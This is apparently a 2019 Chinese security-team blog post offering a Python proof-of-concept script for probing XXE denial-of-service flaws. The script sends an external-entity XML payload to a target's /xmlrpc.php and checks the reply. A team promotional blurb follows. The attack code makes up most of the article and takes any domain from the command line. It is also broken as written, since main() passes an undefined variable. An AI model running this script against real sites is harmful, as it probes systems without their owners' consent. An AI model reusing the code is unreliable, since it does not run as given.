XXE的DOS攻击POC – 作者:TideSec

XXE又名外部实体注入攻击漏洞,此exp由python3编写,进行漏洞探测。


使用命令如下:python XXE_DoS_PoC.py www.test.com


核心代码如下:

# -*- coding:utf-8 -*-

import urllib.request

import urllib.parse

import urllib

import sys

import hashlib



def poc(domain):

    headers = {} #消息头信息

    target = "%s/xmlrpc.php" % domain

    payload = """ <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "a">%remote;]> """

    post_data = {      

        "" : payload,

    }  #POST提交测试代码

    try:

        req = urllib.request.Request(target, data = urllib.parse.urlencode(post_data).encode("UTF-8"), method= "POST")

        response = urllib.request.urlopen(req)

        s = "well formed" #找到命令执行后的回显

        if response:

            data = response.read()

            data = str(data, encoding = "utf-8")

            #print(data)

            if data.find("well formed") != -1:   #获得了证明漏洞存在的回显

                print("likely - XXE DoS\n")



    except Exception as e:

        print("Running Wrong...")

        print(e)

def main():

    args = sys.argv

    url = ""

    if len(args) == 2:

        url = args[1]

        poc(domain)

    else:

        print("Usage: python %s url" % (args[0]))

if __name__ == "__main__":

    main()

Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

Tide安全团队自建立之初持续向CNCERT、CNVD、漏洞盒子、补天、各大SRC等漏洞提交平台提交漏洞,在漏洞盒子先后组建的两支漏洞挖掘团队在全国300多个安全团队中均拥有排名前十的成绩。在产品研发方面,Tide自主研发了一款面向互联网基础设施的资产检索系统,即Tide(潮汐)网络空间搜索平台,平台结合网络安全技术与大数据分析处理技术,对互联网基础设施进行网络安全威胁监测和网络安全态势分析。Tide安全团队自研多套安全平台,如分布式web扫描平台WDScanner、Mars平台、潮汐指纹识别系统、内部SRC平台、安全网络课堂、安全测试案例库、社工库、MoSec移动端检测平台、漏洞知识库、代理资源池、字典权重库等等,团队成员在FreeBuf、简书、CSDN、51CTO、CnBlogs等网站均开设专栏或博客,研究安全技术、分享经验技能。

想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或关注公众号

ewm.png

来源:freebuf.com 2019-04-03 08:58:16 by: TideSec

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论